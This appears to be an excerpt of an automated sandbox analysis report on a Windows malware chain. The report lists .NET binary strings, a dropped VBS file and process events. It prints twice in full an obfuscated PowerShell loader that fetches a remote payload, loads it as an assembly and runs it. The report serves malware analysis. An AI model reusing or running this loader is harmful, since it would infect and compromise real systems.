nlib.dotnet.emitlocaldnlib.dotnet.resourcesbuiltinresourcedatamicrosoft.win32.taskschedulertriggercollectiondnlib.dotnetarraysigdnlib.dotnetcustomattributereaderdnlib.dotnetinterfaceimplusermicrosoft.win32.taskschedulertriggermicrosoft.codeanalysisembeddedattributednlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskprincipalprivilegednlib.utilsextensionsdnlib.dotnet.mdrawassemblyrowdnlib.dotnet.mdrawparamrowdnlib.dotnetmemberrefdnlib.dotnetihasconstantdnlib.dotnetmethodimplattributesdnlib.dotneticorlibtypesdnlib.dotnet.writermethodbodywriterdnlib.dotnetihascustomattributednlib.dotnet.emitinstructiondnlib.dotnet.mdrawtypedefrowdnlib.dotnetiscope source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdbimage_debug_directory source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000005.00000002.1882706332.00000000095E5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000005.00000002.1853721064.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1875380332.00000000093E0000.00000004.08000000.00040000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Suspicious powershell command line found
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::From
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeCode function: 3_2_058DD624 push eax; iretd 3_2_058DD625
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00C3A2CC pushfd ; ret 5_2_00C3A2CE
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00C37561 push 8B09614Eh; iretd 5_2_00C37566
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00C31CFB pushad ; retf 5_2_00C31D7A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00C31DCB pushad ; retf 5_2_00C31DEA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00C31D8B pushad ; retf 5_2_00C31D9A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00C31D9B pushad ; retf 5_2_00C31DAA

                        Persistence and Installation Behavior

                        barindex
                        Command shell drops VBS files
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Temp\octupole.vbsJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
